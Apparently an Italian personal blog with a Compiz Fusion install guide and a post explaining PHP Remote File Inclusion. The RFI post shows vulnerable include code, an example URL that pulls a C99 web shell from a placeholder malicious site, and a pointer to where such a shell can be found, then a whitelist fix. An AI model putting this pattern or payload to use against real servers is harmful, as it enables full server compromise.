ReaLife

Stefano

2008-03-12T03:16:00.000-07:00

Basta un click

2007-12-21T19:29:00.000-08:00

Remote File Inclusion

2007-12-09T09:10:00.000-08:00

L'RFI (Remote File Inclusion) è una vulnerabilità in applicazioni web scritte in PHP o ASP dovuta al mancato controllo dei file inclusi nel codice e passati tramite richieste GET o POST.
Quando il nome di una pagina da includere è passato via GET o POST e non si effettuano controlli si può includere nel codice una pagina arbitraria. Spesso si includono shell scritte generalmente in PHP che forniscono un'ampia gamma di comandi, come la C99, che consente di modificare, rimuovere, creare file sulla cartella del server, fare copie delle tabelle del database, inviare comandi al server ecc., compromettendo in modo decisamente serio la sicurezza del sistema.

Supponiamo di avere un codice del genere:


$page=$_GET["page"];
include($page);
?>

Questo codice prende una pagina come variabile GET e la include all'interno dell'attuale pagina web. Questo codice è decisamente pericoloso per la sicurezza del sistema. Supponiamo che questa pagina sia accessibile a www.miosito.it/vuln.php . A questo punto posso passare come parametro alla mia applicazione una pagina sul server perfettamente lecita, e l'applicazione la includerà al suo interno (es. www.miosito.it/vuln.php?page=index.php ). Ma posso anche includere una shell C99 e il sistema non mi dirà niente ( www.miosito.it/vuln.php?http://sito_malizioso/c99.txt ). L'applicazione aprirà la pagina contenente il codice della C99 in formato txt, prenderà il codice e lo includerà all'interno della pagina che sta creando, consentendo quindi a un eventuale attaccante di avere le piene mani sull'amministrazione del server web.
Una C99 in formato txt la potete trovare qui

Come difendersi

In genere quando voglio includere una pagina esterna in una mia applicazione web voglio includere solo un insieme molto ristretto e numerato di possibili pagine, non tutte le pagine web di questo mondo. Ad esempio, se voglio creare un menu non voglio includere tutte le pagine possibili e immaginabili nella mia variabile GET, ma solo un range ristretto di pagine (per l'appunto quelle che voglio rendere accessibili dal mio menu). Basta quindi fare uno switch-case sui possibili valori della mia variabile GET, e a seconda del valore includere la pagina desiderata, senza lasciare completamente libero arbitrio all'utente. Basta questa accortezza per evitare ogni tipo di vulnerabilità di RFI.

2007-11-26T12:10:00.001-08:00

Installazzione Compiz Fusion con driver ATI

2007-11-26T12:01:00.000-08:00

Iniziamo con lo scaricare da questo link :

http://kanotix.com/files/install-fglrx-debian.sh

lo script per i driver ATI.

Poi successivamente bisogna eseguire lo script dalla console percui torniamo sul nostro bel terminale dando Ctrl+Alt+F1 e rilogghiamoci con i nostri dati

Ora spostiamoci nella dir nella quale avete salvato lo script e diamo sudo sh install-fglrx-debian.sh . Aspettiamo che lo script scarichi i driver per la nostra scheda e che riavvi il sistema.

Aggiungiamo i repository

Diamo da terminale sudo gedit /etc/apt/sources.list

Poi incollate in fondo al file le seguenti righe e salvate :

deb http://download.tuxfamily.org/3v1deb feisty eyecandy

deb-src http://download.tuxfamily.org/3v1deb feisty eyecandy

Ctrl+o invio cosi salviamo e Ctrl +x usciamo dalla sources.list ;

Ora autentichiamo il repository

Recuperando la chiave GPG :
wget http://download.tuxfamily.org/3v1deb/DD800CD9.gpg -O- | sudo apt-key add - ;

Perfetto !!

Ora aggiorniamo la nostra sources.list dando da terminale sudo apt-get update

Rimuoviamo il vecchio compiz

Ora dobbiamo rimuovere il compiz già presente di default in Ubuntu e tutte le sue rimanenti configurazioni. Diamo in sequenza :

sudo apt-get remove compiz-core desktop-effects

rm -rf ~/.compiz

gconftool-2 –shutdown

gconftool-2 –recursive-unset /apps/compiz

Installiamo Compiz core

Ora installiamo Compiz Core,Diamo un :

sudo apt-get install compiz-gnome compizconfig-settings-manager libcompizconfig-backend-gconf

Installiamo Compiz Fusion

Ora non ci resta che installare il set di plugin aggiuntivi e fantascientifici, per gli amici Compiz Fusion :

sudo apt-get install compiz-fusion-*

Avviamo Compiz Fusion

compiz --replace -v &

E il gioco è fatto. Per configurarlo, sotto
Sistema -> Preferenze dovreste trovare il “CompizConfig Settings Manager”, mentre per fare in modo che Compiz si avvii in automatico vi basta andare in:

Sistema -> Preferenze -> Sessioni e aggiungere il comando :

compiz --replace &

Spero di esservi stato d'aiuto . Baciatemi nudo